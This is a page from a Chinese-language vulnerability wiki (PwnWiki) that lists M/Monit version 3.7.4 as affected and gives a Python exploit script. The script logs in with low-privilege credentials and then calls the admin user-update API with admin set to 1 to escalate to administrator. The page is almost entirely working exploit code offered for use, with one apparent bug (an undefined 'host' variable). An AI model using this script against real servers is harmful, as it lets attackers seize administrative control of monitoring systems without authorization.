Loading
0

M/Monit 3.7.4 权限提升漏洞/zh-cn

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

影响版本

Version : 3.7.4

EXP

import sys
import requests

url = 'http://your_ip_here:8080'
username = 'test'
password = 'test123'

sess = requests.Session()
sess.get(host)

def login():
  print('Attempting to login...')
  data = {
    'z_username':username,
    'z_password':password
  }
  headers = {
    'Content-Type':'application/x-www-form-urlencoded'
  }
  
  resp = sess.post(url + '/z_security_check', data=data, headers=headers)
  if resp.ok:
    print('Logged in successfully.')
  else:
    print('Could not login.')
    sys.exit(1)

def privesc():
  data = {
    'uname':username,
    'fullname':username,
    'password':password,
    'admin':1
  }
  resp = sess.post(url + '/api/1/admin/users/update', data=data)
  
  if resp.ok:
    print('Escalated to administrator.')
  else:
    print('Unable to escalate to administrator.')
  
  return

if __name__ == '__main__':
  login()
  privesc()

免费、自由、人人可编辑的漏洞库